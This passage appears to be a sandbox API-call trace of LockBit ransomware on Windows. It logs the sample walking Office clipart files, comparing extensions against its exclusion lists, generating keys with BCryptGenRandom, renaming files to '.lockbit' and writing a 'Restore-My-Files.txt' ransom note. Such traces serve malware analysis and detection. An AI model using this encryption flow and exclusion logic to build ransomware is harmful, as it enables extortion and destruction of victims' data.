(lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0152.755] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0152.755] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0217262.WMF.lockbit") returned 72 [0152.755] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0217262.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0217262.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0152.756] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0152.756] malloc (_Size=0x40068) returned 0x3df0008 [0152.756] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=5252) returned 1 [0152.756] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0152.757] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0152.757] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0152.757] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0152.757] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0152.757] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0152.757] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0152.862] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0217262.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0217262.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0152.862] malloc (_Size=0xa6) returned 0x1fa2ed8 [0152.862] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0152.863] free (_Block=0x1fa2ed8) [0152.863] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0217262.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0152.863] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0152.863] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0152.864] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77652000, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x565cf3f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x77652000, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0xd9a, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0217302.WMF", cAlternateFileName="")) returned 1 [0152.864] lstrcmpiW (lpString1=".", lpString2="J0217302.WMF") returned -1 [0152.864] lstrcmpiW (lpString1="..", lpString2="J0217302.WMF") returned -1 [0152.864] PathFindExtensionW (pszPath="J0217302.WMF") returned=".WMF" [0152.864] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0152.864] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0152.864] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0152.864] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0152.864] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0152.864] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0152.864] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0152.864] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0152.864] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0152.864] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0152.864] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0152.864] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0152.864] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0152.864] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0152.864] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0152.864] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0152.864] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0152.864] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0152.864] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0152.865] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0152.865] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0152.865] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0152.865] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0152.865] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0152.865] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0152.865] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0152.865] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0152.865] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0152.865] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0152.865] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0152.865] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0152.865] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0152.865] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0152.865] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0152.865] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0152.865] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0152.865] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0152.865] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0152.865] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0152.865] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0152.865] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0152.865] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0152.865] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0152.865] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0152.865] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0152.866] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0152.866] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0152.866] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0217302.WMF") returned 1 [0152.866] lstrcmpiW (lpString1="ntldr", lpString2="J0217302.WMF") returned 1 [0152.866] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0217302.WMF") returned 1 [0152.866] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0217302.WMF") returned -1 [0152.866] lstrcmpiW (lpString1="autorun.inf", lpString2="J0217302.WMF") returned -1 [0152.866] lstrcmpiW (lpString1="thumbs.db", lpString2="J0217302.WMF") returned 1 [0152.866] lstrcmpiW (lpString1="iconcache.db", lpString2="J0217302.WMF") returned -1 [0152.866] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0152.866] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0217302.WMF") returned=".WMF" [0152.866] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0152.866] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0152.866] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0152.866] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0152.866] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0152.866] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0152.866] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0152.866] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0152.866] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0152.866] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0152.866] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0152.866] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0152.866] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0152.866] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0152.867] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0152.867] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0152.867] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0152.867] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0152.867] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0152.867] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0152.867] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0152.867] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0152.867] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0152.867] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0152.867] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0152.867] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0152.867] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0152.867] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0152.867] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0217302.WMF.lockbit") returned 72 [0152.867] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0217302.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0217302.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0152.868] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0152.868] malloc (_Size=0x40068) returned 0x3df0008 [0152.868] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=3482) returned 1 [0152.868] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0152.869] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0152.869] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0152.869] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0152.869] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0152.869] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0152.869] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0152.897] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0217302.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0217302.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0152.897] malloc (_Size=0xa6) returned 0x1fa2ed8 [0152.897] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0152.898] free (_Block=0x1fa2ed8) [0152.898] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0217302.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0152.898] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0152.898] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0152.898] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77652000, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x565cf3f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x77652000, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x1ca8, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0217872.WMF", cAlternateFileName="")) returned 1 [0152.898] lstrcmpiW (lpString1=".", lpString2="J0217872.WMF") returned -1 [0152.899] lstrcmpiW (lpString1="..", lpString2="J0217872.WMF") returned -1 [0152.899] PathFindExtensionW (pszPath="J0217872.WMF") returned=".WMF" [0152.899] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0152.899] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0152.899] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0152.899] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0152.899] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0152.899] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0152.899] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0152.899] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0152.899] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0152.899] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0152.899] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0152.899] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0152.899] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0152.899] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0152.899] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0152.899] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0152.899] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0152.899] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0152.900] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0152.900] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0152.900] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0152.900] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0152.900] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0152.900] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0152.900] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0152.900] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0152.900] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0152.900] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0152.900] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0152.900] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0152.900] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0152.900] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0152.900] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0152.900] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0152.900] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0152.900] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0152.900] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0152.900] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0152.900] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0152.900] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0152.901] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0152.901] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0152.901] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0152.901] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0152.901] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0152.901] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0152.901] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0152.901] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0217872.WMF") returned 1 [0152.901] lstrcmpiW (lpString1="ntldr", lpString2="J0217872.WMF") returned 1 [0152.901] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0217872.WMF") returned 1 [0152.901] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0217872.WMF") returned -1 [0152.901] lstrcmpiW (lpString1="autorun.inf", lpString2="J0217872.WMF") returned -1 [0152.901] lstrcmpiW (lpString1="thumbs.db", lpString2="J0217872.WMF") returned 1 [0152.901] lstrcmpiW (lpString1="iconcache.db", lpString2="J0217872.WMF") returned -1 [0152.901] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0152.901] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0217872.WMF") returned=".WMF" [0152.901] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0152.901] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0152.901] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0152.901] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0152.902] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0152.902] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0152.902] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0152.902] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0152.902] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0152.902] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0152.902] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0152.902] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0152.902] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0152.902] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0152.902] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0152.902] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0152.902] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0152.902] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0152.902] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0152.902] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0152.902] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0152.902] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0152.902] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0152.903] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0152.903] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0152.903] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0152.903] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0152.903] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0152.903] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0217872.WMF.lockbit") returned 72 [0152.903] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0217872.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0217872.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xec [0152.904] CreateIoCompletionPort (FileHandle=0xec, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0152.904] malloc (_Size=0x40068) returned 0x1ff1e60 [0152.904] GetFileSizeEx (in: hFile=0xec, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=7336) returned 1 [0152.904] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0152.905] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0152.905] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0152.905] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0152.905] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0152.905] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0152.905] ReadFile (in: hFile=0xec, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0152.909] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0217872.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0217872.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0152.909] malloc (_Size=0xa6) returned 0x1fa2ed8 [0152.909] NtSetInformationFile (FileHandle=0xec, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0152.910] free (_Block=0x1fa2ed8) [0152.910] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0217872.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0152.910] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0152.910] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0152.911] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77652000, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x6607e0d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x77652000, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x8ad6, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0227419.JPG", cAlternateFileName="")) returned 1 [0152.911] lstrcmpiW (lpString1=".", lpString2="J0227419.JPG") returned -1 [0152.911] lstrcmpiW (lpString1="..", lpString2="J0227419.JPG") returned -1 [0152.911] PathFindExtensionW (pszPath="J0227419.JPG") returned=".JPG" [0152.911] lstrcmpiW (lpString1=".386", lpString2=".JPG") returned -1 [0152.911] lstrcmpiW (lpString1=".cmd", lpString2=".JPG") returned -1 [0152.911] lstrcmpiW (lpString1=".exe", lpString2=".JPG") returned -1 [0152.911] lstrcmpiW (lpString1=".ani", lpString2=".JPG") returned -1 [0152.911] lstrcmpiW (lpString1=".adv", lpString2=".JPG") returned -1 [0152.911] lstrcmpiW (lpString1=".theme", lpString2=".JPG") returned 1 [0152.911] lstrcmpiW (lpString1=".msi", lpString2=".JPG") returned 1 [0152.911] lstrcmpiW (lpString1=".msp", lpString2=".JPG") returned 1 [0152.911] lstrcmpiW (lpString1=".com", lpString2=".JPG") returned -1 [0152.911] lstrcmpiW (lpString1=".diagpkg", lpString2=".JPG") returned -1 [0152.911] lstrcmpiW (lpString1=".nls", lpString2=".JPG") returned 1 [0152.911] lstrcmpiW (lpString1=".diagcab", lpString2=".JPG") returned -1 [0152.911] lstrcmpiW (lpString1=".lock", lpString2=".JPG") returned 1 [0152.911] lstrcmpiW (lpString1=".ocx", lpString2=".JPG") returned 1 [0152.911] lstrcmpiW (lpString1=".mpa", lpString2=".JPG") returned 1 [0152.911] lstrcmpiW (lpString1=".cpl", lpString2=".JPG") returned -1 [0152.911] lstrcmpiW (lpString1=".mod", lpString2=".JPG") returned 1 [0152.911] lstrcmpiW (lpString1=".hta", lpString2=".JPG") returned -1 [0152.911] lstrcmpiW (lpString1=".icns", lpString2=".JPG") returned -1 [0152.911] lstrcmpiW (lpString1=".prf", lpString2=".JPG") returned 1 [0152.912] lstrcmpiW (lpString1=".rtp", lpString2=".JPG") returned 1 [0152.912] lstrcmpiW (lpString1=".diagcfg", lpString2=".JPG") returned -1 [0152.912] lstrcmpiW (lpString1=".msstyles", lpString2=".JPG") returned 1 [0152.912] lstrcmpiW (lpString1=".bin", lpString2=".JPG") returned -1 [0152.912] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0152.912] lstrcmpiW (lpString1=".shs", lpString2=".JPG") returned 1 [0152.912] lstrcmpiW (lpString1=".drv", lpString2=".JPG") returned -1 [0152.912] lstrcmpiW (lpString1=".wpx", lpString2=".JPG") returned 1 [0152.912] lstrcmpiW (lpString1=".bat", lpString2=".JPG") returned -1 [0152.912] lstrcmpiW (lpString1=".rom", lpString2=".JPG") returned 1 [0152.912] lstrcmpiW (lpString1=".msc", lpString2=".JPG") returned 1 [0152.912] lstrcmpiW (lpString1=".spl", lpString2=".JPG") returned 1 [0152.912] lstrcmpiW (lpString1=".ps1", 